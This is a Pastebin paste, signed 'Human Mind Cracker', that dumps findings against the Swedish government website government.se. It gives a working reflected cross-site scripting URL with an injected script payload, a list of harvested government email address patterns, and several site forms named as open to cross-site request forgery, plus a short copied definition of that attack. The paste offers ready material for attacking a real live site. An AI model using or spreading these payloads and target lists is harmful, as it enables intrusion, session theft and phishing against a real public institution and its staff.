Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- **********************************************************************************************
- Target: http://www.government.se
- [**] XSS:
- http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp?nocache=true&%3Cscript%3Ealert%28%22XSS%20vuln%20on%20Sweden%20Governement%20website%20found%20by%20Human%20Mind%20Cracker%22%29%3C/script%3E&l=en&d=%22%27%3CkapeV%3E
- ********************** Work on mozzila ;)
- [**] Email:
- email: n.n@gov.se
- email: firstname.lastname@gov.se
- email: ministryname.registrator@gov.se
- email: forvaltningsavdelningen.registrator@gov.se
- email: pressrummet@foreign.ministry.se
- email: n.n@regeringskansliet.se
- email: fornamn.efternamn@regeringskansliet.se
- email: departementsnamnet.registrator@regeringskansliet.se
- [**]Cross-site Request Forgery
- Cross-site Request Forgery (CSRF) is a type of attack whereby unauthorized commands are transmitted from a user that the application trusts. Unlike Cross-site Scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
- [-]solution: Url and Forms that perform important operations must be protected by random tokens (hidden nonce values). These tokens must be checked for validity at the server before the request is processed.
- url: http://www.government.se/sb/d/573/a/12566
- form: <form method="GET" action="http://www.government.se/sb/d/573/a/12566" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
- url: http://www.government.se/sb/d/8317/a/201245
- form: <form method="POST" action="http://www.government.se/sb/d/8317/a/201245" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
- url: http://www.government.se/sb/d/16286/a/202392
- form: <form method="POST" action="http://www.government.se/sb/d/16286/a/202392" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
- url: http://www.government.se/sb/d/15633/a/166579
- form: <form method="POST" action="http://www.government.se/sb/d/15633/a/166579" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
- url: http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp?d=10123&nocache=true&a=117559&l=en
- form: <form method="POST" action="http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
- url: http://www.government.se/sb/d/574/action/browse/c/y2012
- form: <form method="POST" action="http://www.government.se/sb/d/574" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
- Picture : http://www.imagup.com/data/1166123868.html
- human mind cracker
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement